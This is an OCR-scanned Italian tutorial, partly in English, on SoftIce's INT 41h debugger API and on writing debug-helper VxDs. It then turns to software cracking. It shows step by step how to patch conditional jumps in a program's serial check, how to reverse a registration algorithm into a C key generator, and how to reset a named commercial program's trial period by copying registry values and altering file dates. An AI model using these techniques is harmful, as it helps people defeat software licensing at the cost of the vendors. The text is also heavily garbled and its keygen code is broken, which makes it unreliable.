.? 


Come dicevamo prima l’interfaccia API relativa al protect mode debuger è 
implementata tramite INT41h. 

Questo interrupt chiama il debugger di sistema tramite un gate dell’interrupt a 
32 bits, direttamente per eseguire varie funzioni. 

Questa interfaccia è parzialmente non documentata (nel capitolo ASSEMBLER è 
usato dentro al programma MAP). 

La lista che segue mostra le funzioni dell’INT 41h più utilizzate 


AX=00h -- Display character on debug terminal 
entry : 
AL = character to display 


AX=01h -- Read character from debug terminal 
returns: 
AL = readed char 


AX=02h -- Displays a string on debug terminal 
entry: 
DS:ESI pointer to null terminated string to display 


AX=12h -- Displays a string on debug terminal (called by 16 bit code ) 


DS:SI pointer to null terminated string to display 


AX=40h -- Run debugee until specified CS:IP is reached 


entry : 
CX = desired CS 
BX = desires IP 


AX=70h -- Register dot command (32 bit code ) 
entry: 
BL = dot command to register 
ESI = linear address of the handler routine 
= linear address of the help text 
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returns: 
AX == 0 if successful 
AX != 0 if registration failed 


AX=71h -- Register dot command (called by 16 bit code ) 
entry: 
BL = dot command to register 
CX:SI = linear address of the handler routine 


DX:DI = linear address of the help text 


returns: 
AX == 0 if successful 
AX != 0 if registration failed 
AX=72h -- Unregister dot command (unregister dot commands registered 
by both 70h & 71h) 
entry: 


BL = dot command to de-register 


AX=73h -- Debug prinf ( C like printf function >> output on debugger terminal 
) 32 bit 


entry: 
DS:ESI = address of format string 


DS:EDI = address of first parameter passed ( all parameter are DWORD'S ) 


returns: 
EAX = nr. of characters printed on debug terminal 


AX=74h -- Debug printf (C like printf function >> out on debugger terminal) 
16 bit 


entry: 
DS:SI = address of format string 


ES:DI = address of the start of the word or dword arguments 
returns: 


AX = nr of chars outputed 


AX=75h -- Get Register Set 
entry : 
DS:ESI = address of a SaveRegs_Struc type structure 


AX=76h -- Set Alternate Register Set 


entry: 
CX = thread ID (0 for current thread) 


DS:ESI = address of a SaveRegs_Struc type structure 


AX=77h -- Get Command Line Chararacter 
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entry: 
BL = 0 -> get char, text pointer not incremented , leading space not 
ignored 
= 1 -> get char , increment text pointer , leading blank is skipped 


= 2 -? get char , text pointer not incremented ,leading blank is skipped 


exit: 
AL = command line character retrieved 
AH = © if EOL encountered , !0 if more characters await parsing 
AX=78h -- Evaluate Expression 


entry: 
ds:esi expression to evaluate 
returns: 


AX: -> 0, returns a data value 
-> !0 returns a linear address 


CX = TID 

EBX = evaluated value 
AX=79h -- Verify Memory 

entry: 

ECX = length of memory region 

DS:ESI = starting address of memory to verify 

returns: 

AX: -> 0 0K 

-> 10 memory range is invalid 

AX=7A -- Directs debugger to dump current registers 
AX=7b -- Directs debugger to perform a stack dump 

entry: 


BX: -> 01h - verbose stack dump 
-> 02h - 16 bit stack dump 


-> 04h - 32 bit stack dump 


AX=7dh -- Execute Debugger Command 


entry: 
DS:ESI = pointer to the command script 
CX = size in bytes of script 


Alcune strutture: 
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SaveRegs_Struc struc 


Debug_EAX dd 
Debug_EBX dd 
Debug_ECX dd 
Debug_EDX dd 
Debug_ESP dd 
Debug_EBP dd 
Debug_ESI dd 
Debug_EDI dd 
Debug_ES dw ? 
Debug_SS dw ? 
Debug _DS dw ? 
Debug_FS dw ? 
Debug_GS dw ? 
Debug_EIP dd 
Debug_CS dw ? 
dd ? 
Debug_EFlags 
Debug_CR®O dd 
Debug_GDT dq 
Debug_IDT dq 
Debug_LDT dw 
Debug_TR dw ? 
Debug_CR2 dd 
Debug_CR3 dd 
Debug_DR0 dd 
Debug_DR1 dd 
Debug_DR2 dd 
Debug_DR3 dd 
Debug_DR6 dd 
Debug_DR7 dd 


Debug_DR7_2 dd ? 


? 
2 


? 
? 


2 


dd ? 


Mov 


SÌ 


? 
? 


Debug_TR6 dd ? 


Debug_TR7 dd ? 


Debug_TrapNumber dw -1 


Debug_TrapNumber dw -1 


Debug_ErrorCode 
SaveRegs_Struc ends 


dw 0 


Ci sono altre funzioni implementate tramite int 4ih ma sono più complesse e 
questo non èm luogo per creare un capitolo relativo a queste. 
Se desiderate appprofondire l'argomento guardate nel DDK. 


Per 


implementare queste estensioni a SoftIce 


linguaggio scriverle. 


Le scelte cadono tra l’assembler e il C/C++. 
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si deve 


scegliere in 


nquale 


Nel secondo caso conviene procurarsi qualche tool destinato alla scrittura dei 
device driver (Vtools - Vireo Software). 

E’ anche possibile scegliere di scriverlo interamente in assembler. 

Per prima cosa bisogna procurarsi un device ID unico anche se questo non è 
obbligatorio ma serve a fare in modo che il VXD non venga nuovamente riletto se 
già presente in memoria. 

L'ordine di lettura non importa nche se si deve considerare nel caso in cui 
vengano utilizzate nel vostro VXD parti scritte da altri. 

Le uniche parti che devono essere lette prima del nostro modulo sono il VMM e il 
DebugDevice. 

Inoltre nomn sono richieste precauzioni particolari fino a che il vmm.vxd e il 
DebugDevice possiedono Init_Order uguale e 0. 

Questo valore specifica che il VMM deve partire leggendo i VXD partendo con il 
valore più basso per giungere al valore UNDEFINED_INIT_ORDER come ultimo. 

In questo modo semplicemente specificando UNDEFINED_INIT_ORDER tutto sarà OK. 

La successiva cosa veramente importante è la procedura del Virtual Device's 
control. 

Dovrete sempre inserire questa procedura in un segmento BLOCCATO (locked). 
Questa routine è una funzione callback la quale risponde ai messaggi inviati da 
VMM e diretti ai VXD i quali prendono le appropriate misure di risposta. 

Spesso questa routine passa meramente il controllo al vcodice utente 
responsabile di gestire il messaggio. 

Ricordatevi che se avviene il ritorno con il CARRY FLAG settato dal vostro 
handler significa che è avvenuto un errore mentre un CARRY FLAG “pulito” indica 
che tutto è andato per il verso giusto. 

Un debug helper VxD deve gestire al minimo due messaggi 

Queste sono Device_Init e Debug Query. 

Se avete in progetto di scrivere il vostro VXD come un Dynamic loadable device 
driver la procedura di controllo dovrà gestire altri due messaggi e precisamente 
Sys_Dynamic_Device_Init e Sys_Dynamic_Device_Exit. 

In alcuni casi dovrà essere processato anche il messaggio W32_DeviceIocontrol. 


message and write an appropriate handler to dispatch control to your 
procedures.Please note 

Qundo eseguite la compilazione con il MASM dovete mantenere il livello di debug 
ad almeno UNO (parlo del Flag di compilazione) per fare in modo che non vengano 
eliminate certe macro di debug definite in VMM.INC. 

Se il vostro device dispone di un handler per il messaggio Debug Query, 
digitando un comendo DOT seguito dal nome del VXD questo verrà processato. 

Per utilizzare il tipo due dei comandi a punto sarà necessario informare il 
debugger sulla sua esistenza. 

Il miglior posto per fare questo è dentro all’ handler per il messaggio di 
Device_Init. 

Prima di provare a registrare un comando punto dovrete essere sicuri che il 
debugger sia presente. 

Inviando un INT 41h senza un debugger caricato si crea un errore di protezione 
(protection faults). 

Se una protection fault capita dentro a un messaggio Device _Init presente in un 
device letto staticamente, non solo il caricamento dello stesso non arriva a 
buon fine ma anche l’inizializzazione di Win 9x non potrà proseguire. 

Questo spesso crea gravi problemi che necessitano successivamente dell’uso di 
Windows in modo di prova. 

Il metodo più semplice per vedere se il debugger è in uso è quello di usare 
Test_bebug_Installed fornito da vmm (VxdCall Test_Debug_Installed). 

Questo tornerà con lo zero flag cancellato se il debugger è presente. 

Se ZF (zero flag) è settagto allora il debugger non è presente. 

Se questo è vero, ovvero il debugger non è presente, non dovrete caricare il 
VXD. 

Voi dovrete semplicemente fare questo ritornando con il CF settato dal 
messaggio Device_Init message , informando la virtual machine manager che la 
procedura di inizializzazione è fallita. 

Quando invece sarete sicuri che il debugger è presente in memoria potrete 
registrare i vari comandi punto. 
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Questo viene eseguito chiamando INT 41h con AX = 70h. 
Gli altri registri vengono settati con 


BL = comando punto da registrare. (Esempio: mov bl, ‘Z’ per dire che il comando 
è .Z) 

ESI= indirizzo della routine di gestione. 

EDI= Indirizzo della stringa di help terminata con CR. 


Le seguenti sono restrizioni applicabili all’ handler 


1. L’ handler deve risiedere nello stesso stack usato quando viene chiamato 
Int41h 


2. L’handler non deve cambiare CS , DS , e provare ad accedere a indirizzi di 
memoria non validi. 


3.L’handler deve girare sul ringo. 


Dopo aver registrato tali comandi punto potrete accedere alle loro funzioni dal 
debugger. 

Se non lo desiderate più dovrete deregistrarlo. 

Se il vostro VXD è letto staticamente non esiste modo per deregistrare i comendi 
punto che dovranno essere presenti sino alla fne di Win9x. 

Se il VXD è letto dinamicamente ed ad un certo punto lo scaricate dalla memoria 
senza deregistrare i comandi punto potrebbe capitare che se questi venissero 
richiamati i moduli eseguite sarebbero dentro alla spazzatura (il VXD è stato 
scagricato e tolto dalla memoria) con effetti non descrivibili. 


La funzione di deregistrazione viene eseguita con la funzione 72h dell’ INT 41h 
Con BL contenente il comando de deregistrae. 

Una buona scelta è di inserire questo dentro all’handler per il 
Sys_Dynamic_Device_Exit. 

Fino a quando si stà processando un comando punto o un messaggio Debug Query 
message non è buona idea cercare di lasciare SoftIce premendo i tasti definiti. 
Questo resetterebbe anche la macchina intera. 

Quando il debugger chiama l’handler devrebbe settare DS e CS con un flat 
selector. 

Normalmente CS dovrebbe essere 28h. 

Questo legge anche il primo carattere del comando nel registro AL. 

La routine deve eseguire un return FAR visto che sicuramente il debugger, dal 
quale deve tornare, risiederà in un altro segmento. 

O1 valore restituito da AX può essere 0 (0K) o qualsiasi altro valore per 
indicare un'altra condizione. 


.The first thing you should do after entering 


your handler is to parse the command line. This can be accomplished by using 
INT 41h , AX=77h 

(Get command line character) . A pointer to the current character in command 
line is 


maintained by the debugger.The value specified in BL register choose how this 
pointer 

is managed.Also the flag specified in BL sets the way in which one or more 
blank spaces are 


treated.They can be ignored , the pointer value will be updated to the next 
valid character 

in the command line or you can choose to parse them as well.The GetCommandLine 
function will 


return with AH set to © if end of line was encountered , and a value !0 
otherwise.The 
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command line character is retrieved in AL. 
Not much things left to say.It's up to you in which way you will used the 
facilities 


presented here.Your code runs on ring 0 , so you can do just about anything 
you imagine.The 


only thing I want to say is that you should take care about what you are 
doing.Programming 

in ring0 requires a very serious understanding of protection mechanism , page- 
mode memory 

management , x86 internal architecture and the way in which Windows'95 virtual 
memory manager 


manages those facilities.Remember , you have absolute power but using it in a 
wrong way can 

cause your machine to hang , and you can cause loose of data from your hard 
drives.Fair warning! 


Chapter 5: The sample: icecmd.vxd 


Accompanying this article there is a sample VxD who employees most of the 
techniques 

described in the pervious chapter.The VxD does not provide any real 
functionality , it is 


intended only for didactic purposes.It implements a new dot command .Z and a 
DebugQuery 

handler routine.The sample dot command .Zs will dump the stack trace on the 
debug console. 


You can accomplish same thing issuing STACK command in Soft-Ice.It also show 
you very 

basic command line parsing.The VxD is implemented as a static VxD.It also 
present a mechanism 


in which a VxD can detect if it was previously loaded , preventing multiple 
instances.Since 

the code is commented I will not insist in presenting it once again inside the 
article.Read 


the source code ,I tryed to keep things easy to understand. 
The only thing unexplained is the code what prevents the VxD being loaded 
twice. 


This code resides in VxD_REAL_INIT_SEG code segment.This code is auto called 
at the time when 

the system is still in real mode and the Virtual Device Drivers are 
loaded.when the system 

reach this entrypoint the BX register contain a value that indicates if the 
device is already 


loaded or not.The method requires a unique device Id.To allow loading you must 
exit with 
AX set to a certain value , as shown below. 
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Abort_Device_Load -- tells to VMM that this VxD should not be loaded 


Abort_Win386_Load -- tells to VMM to end Windows loading (WIN 95 itself will 
fail loading if this value is passed to AX 


Device_Load_0k -- tells to VMM that al is OK , device can be loaded 
No_Fail_ Message -- use with Abort_Device_Load and 
Abort_Device_Load.Instructs 
the VMM to not display an error message.If not specified 
the VMM will print an error message on screen. 


Also , you must return with BX , EDX , SI registers set to the folowing 
values: 


BX --- must contain a pointer to a null terminated page array table 
containing the physical pages reserved for VxD own use.Valid adress 


ranges are 0 to 100h. (That's it the table must reside in very low 
memory. 


MUST be set to 0 if no pages are reserved 
SI -- must contain a pointer to a null terminated area of data items 
MUST be set to © if there are no specific instance objects. 
EDX -- contain a value who it is passed to the protected mode procedure 
what is the handler for Sys_Critical_Init message broadcasted 
by VMM.This value is re-loaded in EDX just before the protected mode 
init procedure is called 
Usualy set to 0 , but it will not harm anything if contain other 
values. (This is because it's up to you if the handler for 
Sys_Critical_ Init will use it or no) 


This is not my creation , ive learned this from W. Oney's code. 


Download icecmd.zip & source code 


Chapter 6: Moving to ring 3 


Part of the Protected Mode Debug API is available also on ring3.In fact , 
some 
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functions from WIN32 API like OutputDebugString relays on INT 41h to carry out 
the job. 


This opens more interesting possibilities , since you can write ring3 programs 
that 

interacts with a system debugger , retrieving info from it and instructing it 
to carry 


out various actions. 

Note that not entire API is disponible on ring3.Generally, experimenting 
won't 

harm as long as you are sure that a system debugger is installed. 
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ESEMPI 


ESEMPIO 1 


Per iniziare prendiamo un esempio semplice in cui non tenteremo neppure di 
capire la logica di codifica del numero seriale ma semplicemente modificheremo 
il flusso facendo in modo che risponda alla seguente logica 


e CHIEDI IL NUMERO SERIALE 


e SE SBAGLIATO RINGRAZIA PER LA REGISTRAZIONE 


WI?Dasm Alphabetica! List of Imported Functions 


To Search Dissasembb for Function, Double Click cn Te 


MSYBVMEO _ubeAif ar 
KSVEVMEO _ vbaReckneToUni 
MSVBVMEO _vbaRecDesiuot 
MSYVEVHEN _vbeRecDestustsns 
MSYBVMEO _ubeRecUniTadnsa 
kSYBVMEO _vbaRedm 
MSVBVMEO _vb=RecimProsarsa 
HESVBVHMEO _ubeResume 
KEYBVMEO _ vbaSetSyetemEtro! 
MEVBVMEO _vbaStiCat 
MSYVBYHMEN _vbeStiCmp 

KM SYBVMEO _vbeSt:Copy 
hSYBVMEO _ vbaSUFixcti 
MEVBVMEO _vbaStil4 
MEYVBVHMEO _vboSti ove 
MSYBVYMEO _ubeStiToàns 
kSYBVMS0 _ vbaStTollricode 


Copp Al | Copy Mica | 


RI 


In pratica invertiremo il 
controllo fatto. 

Non riporterò il nome del 
programma preso come target 
per non entrare 
nell’illegalità. 
L’interessante comunque non è 
il programma ma le tecniche. 
Carichiamo con WDASM il 
programma e successivamente 
usando l’opzione di menu LOAD 
PROCESS sotto la voce DEBUG 
eseguiamo la lettura. 

Il pulsante IMP FN mostra le 
funzioni importate che in 
questo caso denotano che 
trattasi di un programma in 
visual Basic. 

La richiesta del 
numero di serie 


W32Daxm Code Palche: Message: Instruction OK 


EI? 


fo 049371BÀ 


Enter New Instruction Below 


nov |ebp-04], 


Cade Patch Listing 
ine DOSITICE 


004sT1E8 7514 


Close | Benove Last Line | 


00000060 


Current Instrucrion ar EIP 


Apply Parch | Clear Patch | 


Register LAUNCHKkn0s 
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[xi 


Enter the registration cada below. ihan click [Ok] 
Annota | 


A questo 


avviene mediante una 
dialog d’input. 

Tra le funzioni 
importate ne esiste 
una, chiamata 


MSVBVM60 . rtcInputBox 


Eseguendo un doppio 
click WDASM ci 


posizionerà nei 
punti dove viene 
chiamata la 
funzione. 


Senza impazzire a 
cercare di capire a 
priori in quale 
punto è la chiamata 
giusta posizioneremo 
un breakpoint in 
ciascuno mostrato. 


punto mando in esecuzione il 
programma in attesa che questo si fermi ad 
un breakpoint. 

Compare la maschera nella quale inserisco 


un valore casuale (1234567890). 


Il punto in cui si ferma il codice mostra 
le seguenti linee di programma. 


* Reference To: MSVBVM60.rtcInputBox, Ord:0254h 


:00437143 
100437148 8BDO mov edx, eax 
:0043714A 8D4DCO lea ecx, dword ptr [ebp-40] 


| 
E820CAFCFF Call 00403B68 


Mediante l’analisi dei valori puntati dal registro EAX si 


inserito. 


nota il valore 


[eax+00000000] - 0031 


[eax+00000002] - 0032 
[eax+00000004] - 0033 
[eax+00000006] - 0034 
[eax+00000008] - 0035 
[eax+0000000A] - 0036 
[eax+0000000C] - 0037 


NOCUASWNH 


A questo punto proseguiamo il programma passo a passo per vedere dove avviene 
qualche tipo di comparazione. 
Dopo qualche linea di codice che non riporto ci si trova dinanzi a 


:004371AE E8BAFC9FCFF Call 00403B62 

:004371B3 OFBFCO MOVvsx eax, ax 

:004371B6 85C0 test eax, eax 

:004371B8 7514 jne 004371CE 

:004371BA C745FC6D000000 mov [ebp-04], 0000006D 
:004371C1 BAA4314100 mov edx, 004131A4 

:004371C6 8D4DCO lea ecx, dword ptr [ebp-40] 
Prendo il salto jne 004371CE e lo modifico in je 004371CE. 


WDASM possiede la possibilità di inserire patch al codice in modo momentaneo. 

In altre parole posso, senza uscire, inserire le istruzioni modificate anche se 
poi per farle diventare definitive dovrò modificare il programma tramite un 
editor HEX. 
Continuo a eseguire step by step il programma fino a quando il cursore si 


posiziona 


sulla linea con il salto. 


A questo punto premo il pulsante PATCH CODE. 
Dopo aver richiesto di applicare la patch proseguo passo a passo il programma. 
Il programma viene indirizzato sulle seguenti istruzioni 


:004371CE C745FC6F000000 mov [ebp-04], 0000006F 
:004371D5 8D45C0 lea eax, dword ptr [ebp-40] 
:004371D8 50 push eax 

:004371D9 E806F50400 call 004866E4 

:004371DE OFBFCO MOVvsx eax, ax 

:004371E1 85C0 test eax, eax 

:004371E3 0F859F010000 jne 00437388 


All’indirizzo 004371E3 esiste un altro salto da modificare. 


Non riporto tutto il codice per motivi di spazio. 


Le istruzioni dopo il salto specificato visualizzano il messaggio di codice 


errato per cui il flusso deve essere modificato 
cambiando il jne. 

Giunti sull’ istruzione eseguiamo la patch come 
fatto precedentemente. 

Mandiamo in esecuzione con F9 il programma. 

Come ho detto inizialmente non. ivengono 
mostrati dati relativi al programma usato come 
target per cui anche nella finestra che 
ringrazia per la registrazione eseguita ho 
camuffato i dati relativi al programma. 
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CrcAIna, 


Thank you for registering 


ALCUNE PARTICOLARITA’ DI WDASM. 
WDASM possiede diverse 
proprietà che lo rendono 
particolarmente interessante. 

Nella finestra dove sono 
presenti i pulsanti per 
eseguire lo step by step sonbo 


presenti dei marcatori che 
permettono al programma di 
bloccarsi ogni volta che 

1. VIENE RICHIAMATA UNA 


FUNZIONE DOCUMENTATA 


2. VIENE CHIAMATA UNA FUNZIONE 
NON DOCUMENTATA 


3. VIENE CHIAMATA UNA FUNZIONE 
LOCALE 


Se vengono abilitati questi 
flags ogni volta che si 
verificherà un evento del tipo 
specificato verrà aperta una 
finestra in cui vengono 
mostrati tutti i parametri in 
ingresso alla funzione. 


Sempre da questa finestra è possibile mandare in esecuzione la 


Code Address 


:00403E14 is in Module LAUNCHKAOS. EXE 


:00403DF6 jmp MSVEVMEO0. GetMemZ 
100403DFC jmp MSVEVMEeO0. PutMem? 
:00403E02 jmp MSVEVM6E0. Get Mem4 
:100403E08 jmp MSVEVMEO. PutMem4 
2100403E0E jmp MSVEVMEO0. ThunRTMain 
:00403E14 push 00408820 
:100403E19 call LAUNCHKA0S.00403E0E 
:100403ElE add byte ptr [eax], al 

100403E20 add byte ptr [eax], al 

100403E22 add byte ptr [eax], 
100403EZ4 xor byte ptr [eax], 


al 
Di 
Copy| 
Goto Address 
Patch Code | 


[ step Into "rep" Instruction Bypass - 
Terminate | 


Step Step 
Into Over Dans 
F? Fs 


M Enable Documented API Details 
I Enable UnDocumented API Details API | 


[Enable Local Function Details 
[ stop Auto On API 


AutoStep 
Into FS 


AutoStep 
Over F6 


funzione per 


poter verificare i valori di ritorno. 


La seguente 


immagine mostra la finestra suddetta. 


WI?2Dasm API Detail 


Arg0l = 
Arglz = 
Arg03 = 
Argl4 =» 
Arg0s = 


7£130000 
00000001 
00000001 
00000000 
7£130000 
Argle 006c ddl 
Arg07 


Arg0E 7££30000 


API MODOC Arg00 = Local Funerion|Arg01,ArgD®,Arg03,ArgD4, 
API Addrezz=?PF310EC, API Return Addrezs=7FF31PF1 
=> (LPDIWFOPD) D0S0Sasgd or (LPSTPR) "MII" 


=> (LPDIWOPD) 0080 Sasd or 
-* (CPDHORD) 00000004 or 
b£eMNAeacd ->(LPDIFOPD) 1b01f883 or 
» (LPDWORD) 00905a+d or 


Pila Ei 


RIO, ArgnE, Reg07,Argns) 


(LPATR)* 
(LPSTR) "D* 

(LPATP) "feMMÀfàmtIa) cAlsà 
tLP3TR) "H20' 


[eia' 


Get API Result | 


Premendo Get API Result si ottiene la vista con i valori restituiti dalla call. 
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ESEMPIO 2 (CREAZIONE GENERATORE DI CHIAVI) 


In questo esempio vedremo come utilizzare le informazioni derivanti dalle 
analisi per creare un generatore di chiavi. 

Eseguiamo il programma e quando questo ci chiede il nome e il codice inseriamo 
il nostro nominativo e un codice fittizio. 

Dopo aver, con SoftIce, premuto CTRL-D per attivarlo inseriamo un breakpoint 
cercando di intercettare le funzioni API utilizzate per l’input di tali dati. 

In questo caso l'input avviene con GetDlgItemTextA il quale fa interrompere il 
programma al seguente punto. 


:00404DB2 8D95A8FAFFFF lea edx, dword ptr [ebp+FFFFFAA8] 


:00404DB8 52 push edx $ Il vostro nome 

:00404DB9 E80B550000 call 0040A2C9 ; Routine di registrazione 
:00404DBE 83C408 add esp, 00000008 

:00404DC1 85C0 test eax, eax ; 0 se la registrazione è errata 
:00404DC3 7D17 jge 00404DDC ; 1 se OK. 


A questo punto seguiamo passo a passo entrando nella routine relativa alla 
registrazione (CALL 40A2C9) 


Referenced by a CALL at Addresses: 
:00404DB9 , :00407F76 


:0040A2C9 55 push ebp 

:0040A2CA 8BEC mov ebp, esp 

:0040A2CC 81C4BOFEFFFF add esp, FFFFFEBO 

:0040A2D2 53 push ebx 

:0040A2D3 56 push esi 

:0040A2D4 57 push edi 

:0040A2D5 8B5508 mov edx, dword ptr [ebp+08] 
:0040A2D8 8DB500FFFFFF lea esi, dword ptr [ebp+FFFFFF00] 
:0040A2DE 33C0 xor eax, eax 

:0040A2E0 EB16 jmp 0040A2F8 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0040A2FB(C) 


| 
:0040A2E2 OFBEOA movsx ecx, byte ptr [edx] 


; Qui inizia 
:0040A2E5 83F920 cmp ecx, 00000020 ; ECX è char del nome 
:0040A2E8 740D je 0040A2F7 ; eseguiamo il je 
:0040A2EA 8A0A mov cl, byte ptr [edx] ; copia il nome senza spazi 
:0040A2EC 880C06 mov byte ptr [esi+teax], cl 
:0040A2EF 42 inc edx 
:0040A2F0 40 inc eax 
:0040A2F1 C6040600 mov byte ptr [esi+teax], 00 
:0040A2F5 EB01 jmp 0040A2F8 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0040A2E8(C) 


:0040A2F7 42 inc edx 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:0040A2E0(U), :0040A2F5(U) 


:0040A2F8 803A00 cmp byte ptr [edx], 00 
:0040A2FB 75E5 jne 0040A2E2 
:0040A2FD 56 push esi ; Username per upercase 


* Reference To: USER32.CharUpperA, 0rd:0000h 
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:0040A2FE E80F330000 Call User!CharUpper ; Qui il nome è maiuscolo 


:0040A303 56 push esi 
* Reference To: cw3220mt._strlen, Ord:0000h 


:0040A304 E86F300000 Call 0040D378 ; Lunghezza del nome 


:0040A309 59 pop ecx 

:0040A30A 8BC8 mov ecx, eax ; ECX = lunghezza 
:0040A30C 83F904 cmp ecx, 00000004 ; LEN=4 (DEVE) 
:0040A30F 7D05 jge 0040A316 

:0040A311 83C8FF or eax, FFFFFFFF 

:0040A314 EB67 jmp 0040A37D 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0040A30F(C) 

| 

:0040A316 33D2 xor edx, edx 

:0040A318 33C0 xor eax, eax 

:0040A31A 3BC8 cmp ecx, eax 

:0040A31C 7E17 jle 0040A335 


Qui inizia il codice importante. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


|:0040A333(C) 

:0040A31E 0FBE1C06 movsx ebx, byte ptr [esi+eax] ; EBX= char in user nane, 
; offset in EAX. 

:0040A322 C1E303 shl ebx, 03 ; shl's char di 03h 

:0040A325 0FBE3C06 movsx edi, byte ptr [esi+eax] ; EDI= Char in user name , 
; offset in EAX. 

:0040A329 OFAFF8 imul edi, eax ; moltiplica char per offset dello user 

; name 

:0040A32C 03DF add ebx, edi ; Aggiunge il risultato a EBX 

:0040A32E 03D3 add edx, ebx ; EDX=EDX+EBX 

:0040A330 40 inc eax ; Incrementa EAX (prossimo char) 

:0040A331 3BC8 cmp ecx, eax 

:0040A333 7FE9 jg 0040A31E ; Se ECX<EAX termina il loop 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

|:0040A31C(C) 

| 

:0040A335 A120674100 mov eax, dword ptr [00416720] 

:0040A33A C1F803 sar eax, 03 ; Con SoftIce date '? EAX' (SN) 

:0040A33D 03DO add edx, eax ; ADD il risultato loop al SN 

:0040A33F 52 push edx 


* Possible StringData Ref from Data 0bj ->"%1lx" 
| 
:0040A340 685EF54000 push 0040F55E 
:0040A345 8D95BOFEFFFF lea edx, dword ptr [ebp+FFFFFEB0] 
:0040A34B 52 push edx 
* Reference To: USER32.wsprintfA, Ord:0000h 
| 
:0040A34C E8E5320000 Call 0040D636 
:0040A351 83C40C add esp, 0000000C 
:0040A354 8D8DBOFEFFFF lea ecx, dword ptr [ebp+FFFFFEB0] 


:0040A35A 51 push ecx 
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i HEX converter 


j In SI 'd ecx' 
i SERIAL NUMBER 


Salto il resto del codice in quanto non ci interessa più visto che a questo 
punto abbiamo tutti i calcoli fatti per il SERIAL NUMBER. 
A questo punto scriviamo i C le routine riproducenti i calcoli. 


void main(void) 
{ 
long Key, SerialNum, EB, ED, digit; 
char I,x; 
char Name[50], tmp[20]; 
printf(“Nominativo :”); 
gets(Name); 
strupr(Name); 
printf(“\nSerial Number: ”); 
gets(tmp); 
SerialNum = atol(tmp); 
Key=0; 
x=0; 
for(I=0;I!=strlen(Name);I++) { 
if(Name[I]!=' ') { 
eb Name[I] << 3; 
Name[I]; 
ED*x; 


m 
(©) 
HO HI 


eb=eb+ed; 
Key=Key+EB; 
} 


Key=Key+(SerialNum << 3); 
printf(“\nSN = %x”, Key); 


METODO STANDARD 


Prima di tutto cerchiamo di avere una strategia di default da utilizzare in ogni 


caso. 
Che cosa dobbiamo sapere ? 


Se si tratta di programmi con routines di registrazione e limitazione a x giorni 
sicuramente dovrà scriversi delle informazioni da qualche parte. 


Queste parti potrebbero essere 


a) Dentro allo stesso eseguibile 
b) In un file esterno più o meno nascosto 
Cc) Nel file di registro 


Se i dati sono scritti internamente lo si può vedere in due modi e precisamente 


debuggando il codice o facendo una semplice prova. 


regsnap 


Registry Snapshot: Regilà, contains 61349 keys and 109349 values 
FileList Snapshot for: CAWINDOWS4**: BEI files 

FileList Snapshot for: CAWINDOWS\SYSTEMX® *: 2037 files 

Ini Snap for: win.ini: 69 keys, 1119 values 

Ini Snap for: system.ini; 14 keys, 213 values 

TextFile Snapshot for: c:\autoexec.bat 

TextFile Snapshot for: c:Aconfig.sys 
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Esiste la possibilità che 
la routine usi la data di 
scrittura del file per 
verificare quanti giorni è 
stato attivo. 

Per provare si può 
prendere una utility che 
abbia il touch dentro o si 
può scrivere un piccolo 
programmino che con un 
interrupt del Dos aggiorni 
la data del file. 

Se la data è 12-12-1999 e 
il programma dice “Avete 
ancora 10 giorni”, potete 
fare il touch settando la 


data a 11-12-1999 per vedere se l’avvertimento cambia. 

E’ difficile ma si parte subito scartando le ipotesi più semplici (Sapete il 
detto che il miglior nascondiglio è sotto gli occhi di tutti.) 

Per vedere quanti file sono stati aggiunti dopo l’installazione potete usare due 
utilities. 

Prima di vedere questi due programmi apro una parentesi generale sul come, 
disponendo di due OS (Win 98 e Win NT, Win 98 e Windows 2000 ecc.) è possibile 
osservare le modifiche fatte sul registro. 

Chiaramente le installazioni devono essere fatte in due momenti distanti tra 
loro e non in modo consecutivo. 

Cosa significa ? 

Potrei installare un versione a 60 giorni s9otto Win 98 ed attendere che questa 
scada. 

Successivamente potrei installare lo stesso software sotto Windows 2000 in modo 
tale che le informazioni del registro risultino nuove. 

A questo punto la comparazione sarebbe tra i dati della versione scaduta e 
quelli della nuova installazione. 

Io personalmente mi accerto dell’importanza delle informazioni nel registro 
giocando con l'installazione di due sistemi operativi sulla macchina che uso. 

In pratica dispongo di Windows 98 e di Windows 2000 per cui eseguo 
l’installazione sotto il primo e poi provo anche ad attivare lo stesso software 
da sotto il secondo. 

Spesso i crack che si trovano in giro, su Astalavista ad esempio, settano i dati 
di registrazione dentro al 
registro. 

Questi si vedono subito in 
quanto dopo averli sbloccati 
sotto il primo windows e dopo 
che questi funzionano 
normalmente, attivati sotto 
W2000 segnalano nuovamente il 
limite di xx giorni. 

In questo caso per prima cosa 
cerco le differenze nelle 
voci chiare relative a questi 
software. 

Un esempio pratico lo porto 
legato a Xara3D un programma 


xl 


You have 15 days remaining of your demonstration 
period. If you would you like to purchase and unlock 
2% the program press ‘Purchase’. If you are an existing —. 
(2) owner and find you need a new unlock code press 3D 
'Purchase' to obtain a free new unlock code. 


che crea scritte 3D. 


Il programma è stato originariamente installato sotto WIN 98 e successivamente 
richiamato da Windows 2000. 

La prima volta che è stato lanciato XarasD si è creato nel registro di WIN2000 
le voci che le hanno permesso di essere trattato come un software demo con 15 
giorni a disposizione. 

Il seguente capture mostra una schermata di REGEDIT sotto windows 2000 nella 
quale sono visibili 
le voci create da 
XARA3D. 

Name Data ora disattivo 
{ab] (Default) {value not set) Windows 2000 e 
{alb] Directory CAProgram Files\XARA\XARA3D3 attivo Win 98 OS 
sotto il quale è 
stata eseguita 


Nome Dati 

(ab) (Predefinito] [alore non impostato) 
"CAPROGRAM FILES \<ARA\XxARA3D3" 
Ox5a2c0157 (1512833367) 


l'installazione originale. 
Gli stessi dati riportano i seguenti valori. 
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Risulta immediatamente evidente che sotto Windows 98 c’è una riga in più: KEY. 
Vuoi mica che ... 
Provo a prendere quella voce ed aggiungerla sotto Windows 2000. 


La schermata di 
WIN2000 è quella in 
cui una colonna 
_Name Type Data mostra il ‘Type’ del 
(ab] {Default} REG_SZ {Yalue not set] valore. 
ab] Directory REG_SZ C:\Program Files \XARA\XARA3D3 In poche parole 
FRiKey REG_DWORD 0x5a2c0157 (1512833367) tramite l'opzione NEW 


del menu ho inserito 
una DWORD uguale a 
quella mostrata nella 
schermata di REGEDIT sotto WIN 98. 

